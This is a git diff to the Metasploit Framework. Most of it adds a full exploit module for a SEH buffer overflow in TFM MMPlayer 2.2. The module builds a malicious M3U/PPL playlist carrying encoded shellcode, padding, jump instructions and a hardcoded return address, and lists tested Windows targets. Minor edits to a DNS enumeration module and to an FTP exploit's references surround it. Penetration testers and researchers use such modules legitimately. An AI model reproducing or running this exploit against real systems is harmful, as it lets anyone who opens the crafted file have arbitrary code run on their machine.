diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 8d70d2a412..be34269e76 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('DOMAIN', [ true, "The target domain name"]), OptBool.new('ENUM_AXFR', [ true, 'Initiate a zone transfer against each NS record', true]), - OptBool.new('ENUM_TLD', [ true, 'Perform a top-level domain expansion by replacing the TLD and testing against IANA TLD list', false]), + OptBool.new('ENUM_TLD', [ true, 'Perform a TLD expansion by replacing the TLD with the IANA TLD list', false]), OptBool.new('ENUM_STD', [ true, 'Enumerate standard record types (A,MX,NS,TXT and SOA)', true]), OptBool.new('ENUM_BRT', [ true, 'Brute force subdomains and hostnames via the supplied wordlist', false]), OptBool.new('ENUM_IP6', [ true, 'Brute force hosts with IPv6 AAAA records',false]), diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb new file mode 100644 index 0000000000..a6e89c8f4b --- /dev/null +++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb @@ -0,0 +1,94 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in MMPlayer 2.2 + The vulnerability is triggered when opening a malformed M3U/PPL file + that contains an overly long string, which results in overwriting a + SEH record, thus allowing arbitrary code execution under the context + of the user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'RjRjh Hack3r', # Original discovery and exploit + 'Brendan Coles ' # msf exploit + ], + 'References' => + [ + [ 'OSVDB', '80532' ], + [ 'BID', '52698' ], + [ 'EDB', '18656' ], # .m3u + [ 'EDB', '18657' ] # .ppl + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'seh', + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested on: + # Windows XP Pro SP3 - English + # Windows Vista SP1 - English + # Windows 7 Home Basic SP0 - English + # Windows 7 Ultimate SP1 - English + # Windows Server 2003 Enterprise SP2 - English + [ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe + ], + 'Payload' => + { + 'Size' => 4000, + 'BadChars' => "\x00\x0a\x0d", + 'DisableNops' => false + }, + 'Privileged' => false, + 'DisclosureDate' => 'Mar 23 2012', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppl']) + ], self.class) + + end + + def exploit + + nops = make_nops(10) + sc = payload.encoded + offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length) + jmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes + nseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes + nseh << Rex::Text.rand_text_alphanumeric(2) + seh = [target.ret].pack('V') + + sploit = nops + sploit << sc + sploit << offset + sploit << jmp + sploit << nseh + sploit << seh + + # write file + file_create(sploit) + + end +end + diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index 3dbd5635f9..ce9fe26aab 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ # When a DoS is NOT a DoS + [ 'OSVDB', '82798'], [ 'EDB', '19024'] ], 'DefaultOptions' =>